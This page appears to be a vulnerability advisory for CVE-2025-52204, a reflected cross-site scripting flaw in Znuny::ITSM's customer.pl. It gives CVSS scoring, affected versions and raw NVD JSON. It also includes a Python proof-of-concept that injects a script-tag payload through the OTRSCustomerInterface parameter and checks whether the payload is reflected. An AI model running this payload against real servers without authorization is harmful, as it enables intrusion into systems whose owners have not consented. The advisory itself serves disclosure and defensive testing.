Security Vulnerability Report
中文
CVE-2025-52204 CVSS 6.1 MEDIUM

CVE-2025-52204

Published: 2026-03-23 20:16:23
Last Modified: 2026-04-27 19:18:47

Description

A Cross-Site Scripting (XSS) vulnerability exists in Znuny::ITSM 6.5.x in the customer.pl endpoint via the OTRSCustomerInterface parameter

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Znuny::ITSM 6.5.x
Znuny < 7.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Replace with actual target) target_url = "http://target-ip/znuny/customer.pl" # Malicious payload to test XSS # Payload attempts to execute a simple JavaScript alert payload = ""><script>alert('CVE-2025-52204_XSS');</script>" # Parameters to exploit the vulnerability in OTRSCustomerInterface params = { "OTRSCustomerInterface": payload, "Action": "CustomerTicketMessage" # Example action, may vary based on configuration } try: # Send GET request response = requests.get(target_url, params=params, timeout=10) # Check if the payload is reflected in the response without encoding if payload in response.text: print("[+] Vulnerability Confirmed: The payload was reflected in the response.") print("[+] Check the browser window for the alert popup if manually opened.") else: print("[-] Vulnerability not detected or payload was encoded.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52204", "sourceIdentifier": "[email protected]", "published": "2026-03-23T20:16:23.263", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Scripting (XSS) vulnerability exists in Znuny::ITSM 6.5.x in the customer.pl endpoint via the OTRSCustomerInterface parameter"}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) existe en Znuny::ITSM 6.5.x en el endpoint customer.pl a través del parámetro OTRSCustomerInterface"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "http://znuny.com", "source": "[email protected]"}, {"url": "http://znunyitsm.com", "source": "[email protected]"}, {"url": "https://github.com/j0qq3r/CVE-2025-52204", "source": "[email protected]"}, {"url": "https://www.znuny.org/en/releases/znuny-7-3-1", "source": "[email protected]"}, {"url": "https://github.com/j0qq3r/CVE-2025-52204", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}